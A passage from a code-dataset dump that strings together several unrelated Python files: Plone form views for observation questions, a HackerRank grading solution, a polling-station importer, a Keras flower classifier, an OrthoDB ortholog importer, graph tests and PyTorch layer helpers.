\\t\\t %s\" % (\n sent_info % date.strftime('%d %b %Y, %H:%M CET')\n )\n )\n\n return document\n\n def render(self):\n \"\"\" Export current filters observation in xls\n \"\"\"\n document = self.build_file()\n\n response = self.request.response\n response.setHeader(\n \"content-type\",\n (\"application/vnd.openxmlformats-officedocument\"\n \".wordprocessingml.document\")\n )\n response.setHeader(\n \"Content-disposition\",\n \"attachment;filename=\" + self.context.getId() + \".docx\"\n )\n\n f = StringIO()\n document.save(f)\n f.seek(0)\n response.setHeader('Content-Length', len(f.getvalue()))\n response.write(f.getvalue())\n\n\nclass AddQuestionForm(Form):\n\n ignoreContext = True\n fields = field.Fields(IComment).select('text')\n\n @button.buttonAndHandler(u'Save question')\n def create_question(self, action):\n context = aq_inner(self.context)\n text = self.request.form.get('form.widgets.text', '')\n if not text.strip():\n raise ActionExecutionError(Invalid(u\"Question text is empty\"))\n\n qs = self.context.get_values_cat('Question')\n if qs:\n question = qs[0]\n else:\n q_id = context.invokeFactory(\n type_name='Question',\n id='question-1',\n title='Question 1',\n )\n question = context.get(q_id)\n\n id = str(int(time()))\n item_id = question.invokeFactory(\n type_name='Comment',\n id=id,\n )\n comment = 
question.get(item_id)\n comment.text = text\n\n return self.request.response.redirect(context.absolute_url())\n\n def updateWidgets(self):\n super(AddQuestionForm, self).updateWidgets()\n self.widgets['text'].rows = 15\n\n def updateActions(self):\n super(AddQuestionForm, self).updateActions()\n for k in self.actions.keys():\n self.actions[k].addClass('standardButton')\n self.actions[k].addClass('defaultWFButton')\n\n\nclass AddAnswerForm(Form):\n\n ignoreContext = True\n fields = field.Fields(ICommentAnswer).select('text')\n\n @button.buttonAndHandler(u'Save answer')\n def add_answer(self, action):\n text = self.request.form.get('form.widgets.text', '')\n if not text.strip():\n raise ActionExecutionError(Invalid(u\"Answer text is empty\"))\n observation = aq_inner(self.context)\n questions = [\n q for q in observation.values()\n if q.portal_type == 'Question'\n ]\n if questions:\n context = questions[0]\n else:\n raise ActionExecutionError(Invalid(u\"Invalid context\"))\n id = str(int(time()))\n item_id = context.invokeFactory(\n type_name='CommentAnswer',\n id=id,\n )\n comment = context.get(item_id)\n comment.text = text\n action = 'add-answer'\n api.content.transition(obj=context, transition=action)\n\n return self.request.response.redirect(observation.absolute_url())\n\n def updateWidgets(self):\n super(AddAnswerForm, self).updateWidgets()\n self.widgets['text'].rows = 15\n\n def updateActions(self):\n super(AddAnswerForm, self).updateActions()\n for k in self.actions.keys():\n self.actions[k].addClass('standardButton')\n\n\nclass AddAnswerAndRequestComments(BrowserView):\n def render(self):\n observation = aq_inner(self.context)\n questions = [\n q for q in observation.values()\n if q.portal_type == 'Question'\n ]\n if questions:\n context = questions[0]\n else:\n raise ActionExecutionError(Invalid(u\"Invalid context\"))\n\n comments = [q for q in context.values() if q.portal_type == 'Comment']\n answers = [\n q for q in context.values()\n if q.portal_type == 'CommentAnswer'\n ]\n\n if (len(comments) == len(answers)):\n status = IStatusMessage(self.request)\n msg = _(u'There is a draft answer created for the question.')\n status.addStatusMessage(msg, \"error\")\n return self.request.response.redirect(observation.absolute_url())\n\n context = questions[0]\n\n text = (\n u'For MS coordinator: please draft, edit and finalize '\n u'here your answer AFTER CLOSING COMMENT within your '\n u'member state expert.'\n )\n\n id = str(int(time()))\n item_id = context.invokeFactory(\n type_name='CommentAnswer',\n id=id,\n )\n comment = context.get(item_id)\n comment.text = text\n\n action = 'assign-answerer'\n url = '%s/assign_answerer_form?workflow_action=%s&comment=%s' % (\n context.absolute_url(), action, item_id)\n\n return self.request.response.redirect(url)\n\n\ndef create_comment(text, question):\n id = str(int(time()))\n item_id = question.invokeFactory(type_name='Comment', id=id)\n comment = question.get(item_id)\n comment.text = text\n return comment\n\n\ndef value_or_error(value, err_text):\n if not value:\n raise ActionExecutionError(Invalid(err_text))\n return value\n\n\nclass AddCommentForm(Form):\n\n ignoreContext = True\n fields = field.Fields(IComment).select('text')\n\n @button.buttonAndHandler(u'Add question')\n def create_question(self, action):\n request = self.request\n observation = self.context\n # raising errors before transition as that will\n # cause a transaction.commit\n question = value_or_error(\n observation.get_question(),\n u'Invalid context'\n )\n wid_text = 
self.widgets['text']\n\n text = value_or_error(\n wid_text.extract(u'').strip(),\n u'Question text is empty'\n )\n\n if question.get_status() == 'closed': # fix for question in \"draft\"\n # transition before adding the comment,\n # so the transition guard passes\n api.content.transition(\n obj=question,\n transition='add-followup-question'\n )\n create_comment(text, question)\n\n return request.response.redirect(observation.absolute_url())\n\n def updateWidgets(self):\n super(AddCommentForm, self).updateWidgets()\n self.widgets['text'].rows = 15\n\n def updateActions(self):\n super(AddCommentForm, self).updateActions()\n for k in self.actions.keys():\n self.actions[k].addClass('standardButton')\n\n\nclass EditConclusionP2AndCloseComments(BrowserView):\n def update(self):\n # Some checks:\n waction = self.request.get('workflow_action')\n if waction != 'finish-comments':\n status = IStatusMessage(self.request)\n msg = u'There was an error, try again please'\n status.addStatusMessage(msg, \"error\")\n\n def render(self):\n # Execute the transition\n api.content.transition(\n obj=self.context,\n transition='finish-comments'\n )\n conclusions = self.context.get_values_cat('Conclusions')\n conclusion = conclusions[0]\n url = '%s/edit' % conclusion.absolute_url()\n return self.request.response.redirect(url)\n\n\nclass EditHighlightsForm(edit.DefaultEditForm):\n def updateFields(self):\n super(EditHighlightsForm, self).updateFields()\n self.fields = field.Fields(IObservation).select('highlight')\n self.fields['highlight'].widgetFactory = CheckBoxFieldWidget\n self.groups = [\n g for g in self.groups\n if g.label == 'label_schema_default'\n ]\n\n def updateWidgets(self):\n super(EditHighlightsForm, self).updateWidgets()\n self.widgets['highlight'].template = Z3ViewPageTemplateFile(\n 'templates/widget_highlight.pt'\n )\n\n\nclass AddConclusions(BrowserView):\n def render(self):\n context = aq_inner(self.context)\n conclusions_folder = self.context.get_values_cat('Conclusions')\n\n if conclusions_folder:\n conclusions = conclusions_folder[0]\n url = conclusions.absolute_url() + '/edit'\n\n else:\n url = '{}/++add++Conclusions'.format(context.absolute_url())\n\n return self.request.response.redirect(url)\n","repo_name":"eea/emrt.necd.content","sub_path":"emrt/necd/content/observation.py","file_name":"observation.py","file_ext":"py","file_size_in_byte":71258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"7577800406","text":"#\ndef gradingAlgorithm(n):\n if n < 38:\n return n\n else:\n if n%5 > 2:\n return (n+5-n%5)\n else:\n return n\ndef gradingStudents(grades):\n # Write your code here\n rounded = []\n for grade in grades:\n rounded.append(gradingAlgorithm(grade))\n return rounded","repo_name":"kmb21/Hackerank","sub_path":"Python/Grading.py","file_name":"Grading.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"25954952178","text":"from django.contrib.gis.geos import Point\nfrom data_collection.management.commands import BaseXpressDemocracyClubCsvImporter\n\n\nclass Command(BaseXpressDemocracyClubCsvImporter):\n council_id = \"E06000005\"\n addresses_name = (\n \"parl.2019-12-12/Version 1/Democracy_Club__12December2019darling.tsv\"\n )\n stations_name = (\n \"parl.2019-12-12/Version 1/Democracy_Club__12December2019darling.tsv\"\n )\n elections = [\"parl.2019-12-12\"]\n csv_delimiter = \"\\t\"\n allow_station_point_from_postcode = 
False\n\n def station_record_to_dict(self, record):\n\n if record.polling_place_id == \"5634\": # The Reading Room\n rec = super().station_record_to_dict(record)\n rec[\"location\"] = Point(-1.49308179, 54.48766450, srid=4326)\n return rec\n\n return super().station_record_to_dict(record)\n\n def address_record_to_dict(self, record):\n rec = super().address_record_to_dict(record)\n uprn = record.property_urn.strip().lstrip(\"0\")\n\n if uprn == \"10013318194\": # Suspicious postcode\n return None\n\n if uprn in [\n \"10013315063\", # DL14EP -> DL14ER : Willow Green Care Home, Eastbourne Road, Darlington\n \"200002723491\", # DL22XJ -> DL22UF : Elm Bank Cottage, Houghton Bank, Heighington (Part)\n ]:\n rec[\"accept_suggestion\"] = True\n\n if uprn in [\n \"10013312294\", # DL13JU -> DL21RL : Little Burdon Farm, Sadberge\n \"10013312299\", # DL13JU -> DL21RL : Little Burdon Farm Cottage, Sadberge\n \"200002722478\", # DL13LA -> DL13LB : Orchard House, The Green, Brafferton\n \"100110749824\", # DL21QB -> DL21QG : Ivy House, Snipe Lane, Hurworth\n \"100110718839\", # DL21QB -> DL22SA : Blackwell Moor Farm, Snipe Lane, Hurworth\n \"10013315658\", # DL37LU -> DL11TZ : Managers Accommodation, 17 Post House Wynd, Darlington\n ]:\n rec[\"accept_suggestion\"] = False\n\n return rec\n","repo_name":"mbateman/UK-Polling-Stations","sub_path":"polling_stations/apps/data_collection/management/commands/import_darlington.py","file_name":"import_darlington.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"2"} +{"seq_id":"34926349656","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 10 14:35:47 2019\r\n\r\n@author: Habibullah\r\n\"\"\"\r\n\r\nimport os\r\nimport zipfile\r\nimport random\r\nimport tensorflow as tf\r\nfrom tensorflow import lite\r\nfrom tensorflow.keras.optimizers import RMSprop\r\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.preprocessing import image\r\nfrom shutil import copyfile\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nlocal_zip = 'flower_photos.zip'\r\nzip_ref = zipfile.ZipFile(local_zip,'r')\r\nzip_ref.extractall(\"C:/Users/Habibullah/Desktop/Leaves Recognition\")\r\nzip_ref.close()\r\n\r\n\r\nliste = [\"daisy\",\"dandelion\",\"roses\",\"sunflowers\",\"tulips\"]\r\n \r\n\r\ntry :\r\n os.mkdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/training\")\r\n os.mkdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/testing\")\r\n\r\nexcept OSError :\r\n pass\r\n\r\nfor variety in liste :\r\n try :\r\n os.mkdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/training/\" + variety)\r\n os.mkdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/testing/\" + variety)\r\n except OSError :\r\n pass\r\n\r\n# Let's preview a couple of example folders.\r\n \r\n#print(len(os.listdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/leaf_uci/training/Acer negundo\")))\r\n#print(len(os.listdir(\"C:/Users/Habibullah/Desktop/Leaves Recognition/leaf_uci/testing/Acer palmatum\")))\r\n \r\ndef split_data(SOURCE, TRAINING,TESTING,SPLIT_SIZE) :\r\n files = []\r\n for filename in os.listdir(SOURCE) :\r\n file = SOURCE + filename\r\n if os.path.getsize(file) > 0 :\r\n files.append(filename)\r\n else :\r\n print(filename + \" is zero length, so ignoring\")\r\n\r\n training_length = int(len(files) * SPLIT_SIZE)\r\n testing_length = int(len(files) - training_length)\r\n shuffled_set = random.sample(files,len(files))\r\n 
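# random.sample(files, len(files)) returns a new shuffled copy and leaves
# `files` itself untouched; the slices below then take the first SPLIT_SIZE
# share as the training set and the remainder as the test set. Call
# random.seed(...) beforehand if a reproducible split is ever needed.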
training_set = shuffled_set[0:training_length]\r\n testing_set = shuffled_set[-testing_length:]\r\n \r\n for filename in training_set :\r\n this_file = SOURCE + filename\r\n destination = TRAINING + filename\r\n copyfile(this_file,destination)\r\n \r\n for filename in testing_set :\r\n this_file = SOURCE + filename\r\n destination = TESTING + filename\r\n copyfile(this_file,destination)\r\n\r\nsplit_size = .8\r\n\r\nfor name in liste :\r\n SOURCE_DIR = \"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/\" + name + \"/\"\r\n TRAINING_DIR = \"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/training/\" + name + \"/\"\r\n TESTING_DIR = \"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/testing/\" + name + \"/\"\r\n \r\n split_data(SOURCE_DIR,TRAINING_DIR,TESTING_DIR,split_size)\r\n\r\nTRAINING_DIR = \"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/training/\"\r\ntraining_datagen = ImageDataGenerator(\r\n rescale = 1./255,\r\n rotation_range=40,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n fill_mode='nearest')\r\n\r\ntraining_generator = training_datagen.flow_from_directory(\r\n TRAINING_DIR,\r\n target_size = (300,300),\r\n class_mode = \"categorical\")\r\n\r\nTESTING_DIR = \"C:/Users/Habibullah/Desktop/Leaves Recognition/flower_photos/testing/\"\r\ntesting_datagen = ImageDataGenerator(rescale = 1./255)\r\n\r\ntesting_generator = testing_datagen.flow_from_directory(\r\n TESTING_DIR,\r\n target_size = (300,300),\r\n class_mode = \"categorical\")\r\n\r\n\r\nmodel = tf.keras.models.Sequential([\r\n tf.keras.layers.Conv2D(64, (3,3), activation = \"relu\", input_shape = (300,300,3)),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n tf.keras.layers.Conv2D(64, (3,3), activation = \"relu\"),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n tf.keras.layers.Conv2D(128, (3,3), activation = \"relu\"),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n tf.keras.layers.Conv2D(128, (3,3), activation = \"relu\"),\r\n tf.keras.layers.MaxPooling2D(2,2),\r\n \r\n tf.keras.layers.Flatten(),\r\n tf.keras.layers.Dropout(0.5),\r\n tf.keras.layers.Dense(1024, activation = \"relu\"),\r\n tf.keras.layers.Dense(5, activation = \"softmax\")\r\n ])\r\n \r\nmodel.summary()\r\n\r\nmodel.compile(loss = \"categorical_crossentropy\", optimizer = RMSprop(lr=0.001), metrics = ['accuracy'])\r\n\r\nhistory = model.fit_generator(training_generator,\r\n epochs = 35,\r\n validation_data = testing_generator,\r\n verbose = 1)\r\n\r\nacc=history.history['acc']\r\nval_acc=history.history['val_acc']\r\nloss=history.history['loss']\r\nval_loss=history.history['val_loss']\r\n\r\nepochs=range(len(acc))\r\n\r\nplt.plot(epochs, acc, 'r', \"Training Accuracy\")\r\nplt.plot(epochs, val_acc, 'b', \"Validation Accuracy\")\r\nplt.title('Training and validation accuracy')\r\nplt.figure()\r\n\r\nplt.plot(epochs, loss, 'r', \"Training Loss\")\r\nplt.plot(epochs, val_loss, 'b', \"Validation Loss\")\r\nplt.figure()\r\n\r\n\r\nkeras_file=\"flower.h5\"\r\nmodel.save(keras_file)\r\nconverter=lite.TocoConverter.from_keras_model_file(keras_file)\r\ntflite_model=converter.convert()\r\nopen(\"cnn.tflite\",\"wb\").write(tflite_model)\r\n\r\n\r\nmodel.load_weights(\"flower.h5\")\r\npath = \"C:/Users/Habibullah/Desktop/Leaves Recognition/daisy.jpeg\"\r\nimg=image.load_img(path,target_size=(300,300))\r\nx=image.img_to_array(img)\r\nx=np.expand_dims(x, axis=0)\r\nimages = np.vstack([x])\r\nsonuc = model.predict(images, 
batch_size=10)\r\nprint(sonuc[0])\r\nprint(np.argmax(sonuc))\r\na=np.argmax(sonuc)\r\nprint(a)\r\nif a==0:\r\n print(\"it is a daisy\")\r\nif a==1:\r\n print(\"it is a dandelion\")\r\nif a==2:\r\n print(\"it is a rose\")\r\nif a==3:\r\n print(\"it is a sunflower\")\r\nif a==4:\r\n print(\"it is a tulips\")\r\n\r\n\r\n","repo_name":"HabibullahMetin/FlowerRecognition","sub_path":"flower_recognition_files/flower_recognition.py","file_name":"flower_recognition.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"32517010900","text":"def rob(values:list, n:int):\r\n if n == 0:\r\n return values[n]\r\n if n < 0:\r\n return 0\r\n \r\n pick = values[n] + rob(values, n - 2)\r\n notPick = rob(values, n - 1)\r\n return max(pick, notPick)\r\nhouses = [2, 7, 9, 3, 1]\r\nmaxValue = rob(houses, len(houses) - 1)\r\nprint(maxValue)","repo_name":"DrakeF2000/CoolStuff","sub_path":"House Robber.py","file_name":"House Robber.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"9462831179","text":"import pandas as pd\nimport csv\nimport os\nfrom biothings_client import get_client\nimport mygene\nimport requests\nimport ast\nimport math\nimport numpy as np\nfrom threading import Thread, RLock\nimport queue\nfrom source.utils.tools import find_pattern, function_in_thread\nfrom source.utils.sequence import is_metazoan, find_sequence\n\n\nlock = RLock()\n\n\nclass fill_csv(Thread):\n def __init__(self, group_acc_seq,uniprot_id_list,\n pattern, mt, path, writer, resp):\n Thread.__init__(self)\n self.group_acc_seq = group_acc_seq\n self.uniprot_id_list = uniprot_id_list\n self.pattern = pattern\n self.mt = mt\n self.path = path\n self.writer = writer\n self.resp = resp\n\n def run(self):\n for i, (acc, group) in enumerate(self.group_acc_seq):\n print(\"import %s from csv file\" % acc)\n with requests.Session() as s:\n if acc not in self.uniprot_id_list:\n pos_list = []\n seq_list = []\n que = queue.Queue()\n # Info from gene\n r = (self.resp).loc[[acc]]\n geneID = None\n taxID = None\n\n if \"_id\" in r:\n geneID = r[\"_id\"].values[0]\n if \"taxid\" in r:\n taxID = r[\"taxid\"].values[0]\n metazoan = is_metazoan(taxID, self.mt)\n clusterID = function_in_thread(que, [acc,\n geneID,\n self.path,\n s],\n request_cluster_id)\n name = \"%s.fasta\" % acc\n path2fastas = \"%s/fastas\" % self.path\n path2cluster = \"%s/%s\" % (path2fastas, name)\n sequence = function_in_thread(que, [path2cluster,\n group[\"seq_in_window\"].tolist(),\n taxID], find_sequence)\n if sequence != \"None\":\n for position, seq in zip(group[\"position\"], group[\"seq_in_window\"]):\n match = function_in_thread(que, [seq, sequence], find_pattern)\n tmp_position = None\n if len(match):\n for r in match:\n if tmp_position is None:\n dist = len(sequence) + 1\n else:\n dist = abs(tmp_position - position)\n if dist > abs(6 + r.start() - position):\n tmp_position = 6 + r.start()\n position = tmp_position\n else:\n position = None\n if position not in pos_list and position is not None:\n pos_list.append(position)\n seq_list.append(seq)\n\n with lock:\n if len(pos_list):\n (self.writer).writerow([acc, geneID, taxID, metazoan, self.pattern, seq_list,\n pos_list, clusterID, sequence])\n\n\ndef import_csv(csv):\n df = pd.read_csv(csv, sep=\"\\t\", header=None)\n df.columns = [\n 'prot_name',\n 'acc',\n 'position',\n 'type',\n 'pmids',\n 'database',\n 'code',\n 
'tpm',\n 'seq_in_window'\n ]\n # Convert data into category\n for cat in df.columns:\n if cat != \"position\":\n df[cat] = df[cat].astype('category')\n return df\n\n\ndef request_gene_id(geneID, s):\n request = 'http://www.orthodb.org/search?query=%s&ncbi=1' \\\n '&singlecopy=1&limit=1&universal=1' % geneID\n response = s.get(request)\n if response.status_code == 200:\n return response.json()\n else:\n print(\"status code for %s = %s\" % (request, response.status_code))\n return None\n\n\ndef uniprotid_to_geneid(uniprotid_list):\n mg = mygene.MyGeneInfo()\n if len(uniprotid_list):\n return mg.querymany(uniprotid_list, scope='symbol,accession',\n fields='uniprot, taxid', species=\"all\", as_dataframe=True)\n else:\n return []\n\n\ndef request_ortho_db(s, id, ncbi, path2file):\n request_odb = 'http://www.orthodb.org/fasta?query=%s&ncbi=%s' % (id, ncbi)\n resp = s.get(request_odb)\n if resp.status_code == 200:\n content = resp.content.decode(\"ascii\")\n try:\n ast.literal_eval(content)\n except:\n request_api = 'wget \\'%s\\' -O %s' % (request_odb, path2file)\n os.system(request_api)\n return True\n else:\n print(\"status code for %s = %s\" % (request_odb, resp.status_code))\n return False\n\n\ndef request_cluster_id(acc, geneID, path, s):\n cluster_id = \"nan\"\n name = \"%s.fasta\" % acc\n path2fastas = \"%s/fastas\" % path\n path2file = \"%s/%s\" % (path2fastas, name)\n os.makedirs(path2fastas, exist_ok=True)\n downloaded = False\n if not os.path.exists(path2file):\n downloaded = request_ortho_db(s, acc, 0, path2file)\n if geneID is not None:\n if not downloaded and not math.isnan(float(geneID)):\n downloaded = request_ortho_db(s, geneID, 1, path2file)\n if downloaded or os.path.exists(path2file):\n cluster_id = acc\n return cluster_id\n\n\ndef import_ortholog(csv_file, pattern, nthread):\n print(\"Parsing csv\")\n\n if os.path.exists(\"%s/data\" % os.path.dirname(csv_file)):\n path = \"%s/data\" % os.path.dirname(csv_file)\n else:\n path = os.path.dirname(os.path.dirname(csv_file))\n file_name = os.path.basename(csv_file)\n os.makedirs(\"%s/csv/%s\" % (path, pattern), exist_ok=True)\n index_file = '%s/csv/%s/index_%s_%s.csv' % (path, pattern, file_name[:-4], pattern)\n df = import_csv(csv_file)\n mt = get_client(\"taxon\")\n\n print(\"Extracting %s phosphorylation site\" % pattern)\n\n uniprot_id_list = []\n if os.path.exists(index_file) and os.path.getsize(index_file) > 0:\n index_df = pd.read_csv(index_file, sep=';')\n uniprot_id_list = index_df[\"uniprotID\"].value_counts().keys().tolist()\n\n print(\"Preparing queries\")\n uniprot_to_convert = set(df[\"acc\"].tolist()) - set(uniprot_id_list)\n resp = uniprotid_to_geneid(uniprot_to_convert)\n\n sub_df = df[df[\"acc\"].isin(list(uniprot_to_convert))]\n sub_df.reset_index()\n with open(index_file, 'a+', newline='') as g:\n writer = csv.writer(g, delimiter=\";\")\n g.seek(0)\n first_char = g.read(1)\n if not first_char:\n writer.writerow(['uniprotID', 'geneID', 'taxID', 'metazoan', 'code',\n 'seq_in_window', 'pos_sites', 'clusterID', 'sequence'])\n\n group_acc_seq = sub_df.groupby([\"acc\"], observed=True)\n data_thread = np.array_split(group_acc_seq, nthread)\n thread_list = []\n for data in data_thread:\n thread_list.append(fill_csv(data, uniprot_id_list,\n pattern, mt, path, writer, resp))\n for thread in thread_list:\n thread.start()\n for thread in thread_list:\n thread.join()\n return 
index_file\n","repo_name":"ZoeBrunet/phosphorylation_prediction","sub_path":"source/dataset/import_csv.py","file_name":"import_csv.py","file_ext":"py","file_size_in_byte":7593,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"12303675625","text":"import pytest\nfrom graph.graph import Graph\nfrom graph.graph_business_trip import business_trip\n\ng = Graph()\npandora = g.add_vertex('Pandora')\narendelle = g.add_vertex('Arendelle')\nmetroville = g.add_vertex('Metroville')\nmonstroplolis = g.add_vertex('Monstroplolis')\nnarnia = g.add_vertex('Narnia')\nnaboo = g.add_vertex('Naboo')\n\ng.add_edge(pandora, metroville, 82)\ng.add_edge(pandora, arendelle, 150)\ng.add_edge(arendelle, metroville, 99)\ng.add_edge(arendelle, monstroplolis, 42)\ng.add_edge(metroville, monstroplolis, 105)\ng.add_edge(metroville, narnia, 37)\ng.add_edge(metroville, naboo, 26)\ng.add_edge(monstroplolis, naboo, 73)\ng.add_edge(narnia, naboo, 250)\n\n\ndef test_no_trip():\n \"\"\"\n Test case for the business_trip function when there is no trip between cities.\n \"\"\"\n actual = business_trip(g, [narnia, arendelle, naboo])\n expected = None\n assert actual == expected\n\n\ndef test_with_trip():\n \"\"\"\n Test case for the business_trip function when there is a trip between cities.\n \"\"\"\n actual = business_trip(g, [narnia, naboo, monstroplolis])\n expected = 323\n assert actual == expected\n\n\ndef test_one_city():\n \"\"\"\n Test case for the business_trip function when there is only one city in the trip.\n \"\"\"\n actual = business_trip(g, [narnia])\n expected = 0\n assert actual == expected\n","repo_name":"mshnas9/data-structures-and-algorithms","sub_path":"graph/tests/test_business_trip.py","file_name":"test_business_trip.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31152868946","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.autograd import Variable\r\nimport numpy as np\r\nimport torchvision.models as models\r\nimport random\r\n\r\nclass Lambda(nn.Module):\r\n def __init__(self, lambda_fn):\r\n super().__init__()\r\n self.lambda_fn = lambda_fn\r\n\r\n def forward(self, x):\r\n return self.lambda_fn(x)\r\n\r\n\r\nclass Flatten(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def forward(self, x): \r\n return x.view(x.shape[0], -1)\r\n\r\nclass layer_normalization(nn.Module):\r\n\r\n def __init__(self, features, epsilon=1e-8):\r\n '''Applies layer normalization.\r\n Args:\r\n epsilon: A floating number. 
A very small number for preventing ZeroDivision Error.\r\n '''\r\n super(layer_normalization, self).__init__()\r\n self.epsilon = epsilon\r\n self.gamma = nn.Parameter(torch.ones(features))\r\n self.beta = nn.Parameter(torch.zeros(features))\r\n\r\n def forward(self, x):\r\n mean = x.mean(-1, keepdim=True)\r\n std = x.std(-1, keepdim=True)\r\n return self.gamma * (x - mean) / (std + self.epsilon) + self.beta\r\n\r\ndef conv_relu(in_channels, out_channels, kernel_size=3, stride=1,\r\n padding=1, bias=True):\r\n return [\r\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size, \r\n stride=stride, padding=padding, bias=bias),\r\n nn.ReLU(inplace=True),\r\n ]\r\n\r\ndef conv_bn_relu(in_channels, out_channels, kernel_size=3, stride=1, \r\n padding=1, bias=False):\r\n return [\r\n nn.Conv2d(in_channels, out_channels, kernel_size=kernel_size,\r\n stride=stride, padding=padding, bias=bias),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU(inplace=True),\r\n ]\r\n\r\ndef linear_bn_relu_drop(in_channels, out_channels, dropout=0.5, bias=False):\r\n layers = [\r\n nn.Linear(in_channels, out_channels, bias=bias),\r\n nn.BatchNorm1d(out_channels),\r\n nn.ReLU(inplace=True)\r\n ]\r\n if dropout > 0:\r\n layers.append(nn.Dropout(dropout))\r\n return layers\r\n\r\n\r\ndef conv_1x1_bn(inp, oup):\r\n return nn.Sequential(\r\n nn.Conv2d(in_channels=inp, out_channels=oup, kernel_size=1, stride=1, padding=0, bias=False),\r\n nn.BatchNorm2d(num_features=oup, eps=1e-05, momentum=0.1, affine=True),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\ndef conv_bn(inp, oup, stride):\r\n return nn.Sequential(\r\n nn.Conv2d(in_channels=inp, out_channels=oup, kernel_size=3, stride=stride, padding=1, bias=False),\r\n nn.BatchNorm2d(num_features=oup, eps=1e-05, momentum=0.1, affine=True),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\ndef up_pooling(in_channels, out_channels, kernel_size=2, stride=2):\r\n return nn.Sequential(\r\n nn.ConvTranspose2d(in_channels, out_channels, kernel_size=kernel_size, stride=stride),\r\n nn.BatchNorm2d(out_channels),\r\n nn.ReLU(inplace=True)\r\n )\r\n\r\nclass ChannelAttention(nn.Module):\r\n\r\n def __init__(self, inplanes, reduction_ratio = 16):\r\n super(ChannelAttention, self).__init__()\r\n self.avgpool = nn.AdaptiveAvgPool2d(1) # Output size of 1x1xC\r\n self.fc = nn.Sequential(\r\n nn.Linear(inplanes, inplanes // reduction_ratio),\r\n nn.ReLU(),\r\n nn.Linear(inplanes // reduction_ratio, inplanes),\r\n nn.Sigmoid()\r\n )\r\n\r\n def forward(self, x):\r\n batch_size, num_channels, _, _ = x.size()\r\n y = self.avgpool(x).view(batch_size, num_channels)\r\n y = self.fc(y).view(batch_size, num_channels, 1, 1)\r\n return x * y\r\n\r\ndef conv3x3(in_planes, out_planes, stride=1, has_bias=False):\r\n \"3x3 convolution with padding\"\r\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\r\n padding=1, bias=has_bias)\r\n\r\n\r\ndef conv3x3_bn_relu(in_planes, out_planes, stride=1):\r\n return nn.Sequential(\r\n conv3x3(in_planes, out_planes, stride),\r\n SynchronizedBatchNorm2d(out_planes),\r\n nn.ReLU(inplace=True),\r\n )\r\n\r\nclass AdaptiveConcatPool2d(nn.Module):\r\n def __init__(self, sz=None):\r\n super().__init__()\r\n sz = sz or (1, 1)\r\n self.ap = nn.AdaptiveAvgPool2d(sz)\r\n self.mp = nn.AdaptiveMaxPool2d(sz)\r\n\r\n def forward(self, x):\r\n return torch.cat([self.mp(x), self.ap(x)], 1)\r\n\r\n\r\nclass GlobalAvgPool2d(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def forward(self, x):\r\n h, w = x.shape[2:]\r\n return nn.functional.avg_pool2d(\r\n 
input=x,\r\n kernel_size=(h, w))\r\n\r\n\r\nclass GlobalMaxPool2d(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def forward(self, x):\r\n h, w = x.shape[2:]\r\n return nn.functional.max_pool2d(\r\n input=x,\r\n kernel_size=(h, w))\r\n\r\n\r\nclass GlobalConcatPool2d(nn.Module):\r\n def __init__(self):\r\n super().__init__()\r\n self.avg = GlobalAvgPool2d()\r\n self.max = GlobalMaxPool2d()\r\n\r\n def forward(self, x):\r\n return torch.cat([self.avg(x), self.max(x)], 1)\r\n\r\n\r\ndef get_fc(in_feat, n_classes, activation=None):\r\n layers = [\r\n nn.Linear(in_features=in_feat, out_features=n_classes)\r\n ]\r\n if activation is not None:\r\n layers.append(activation)\r\n return nn.Sequential(*layers)\r\n\r\n\r\ndef get_classifier(in_feat, n_classes, activation, p=0.5):\r\n layers = [\r\n nn.BatchNorm1d(num_features=in_feat),\r\n nn.Dropout(p),\r\n nn.Linear(in_features=in_feat, out_features=n_classes),\r\n activation\r\n ]\r\n return nn.Sequential(*layers)\r\n\r\n\r\ndef get_mlp_classifier(in_feat, out_feat, n_classes, activation, p=0.01, p2=0.5):\r\n layers = [\r\n nn.BatchNorm1d(num_features=in_feat),\r\n nn.Dropout(p),\r\n nn.Linear(in_features=in_feat, out_features=out_feat),\r\n nn.ReLU(),\r\n nn.BatchNorm1d(num_features=out_feat),\r\n 